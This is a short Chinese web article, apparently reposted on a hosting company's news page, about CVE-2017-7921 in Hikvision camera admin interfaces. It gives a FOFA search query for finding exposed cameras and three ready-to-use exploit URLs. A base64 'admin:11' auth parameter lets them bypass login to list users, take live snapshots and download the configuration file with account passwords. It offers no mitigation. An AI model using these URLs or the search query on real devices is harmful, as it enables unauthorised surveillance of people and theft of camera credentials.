温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何进行CVE-2017-7921的漏洞分析

发布时间:2021-12-29 19:10:00 来源:亿速云 阅读:501 作者:柒染 栏目:安全技术

如何进行CVE-2017-7921的漏洞分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

一、漏洞概述:

杭州海康威视系统技术有限公司摄像头管理后台存在未授权,通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。

fofa网址:fofa.so

fofa搜索:app="HIKVISION-视频监控"

如何进行CVE-2017-7921的漏洞分析

如何进行CVE-2017-7921的漏洞分析

二、漏洞利用:

1、利用路径:

http://your-ip/Security/users?auth=YWRtaW46MTEK

YWRtaW46MTEKadmin:11的base64编码

检索所有用户及其角色的列表。

如何进行CVE-2017-7921的漏洞分析

2、利用路径:

http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK

获取监控快照,不进行身份验证。

3、利用路径:

http://your-ip/System/configurationFile?auth=YWRtaW46MTEK

下载摄像头配置账号密码文件。

关于如何进行CVE-2017-7921的漏洞分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI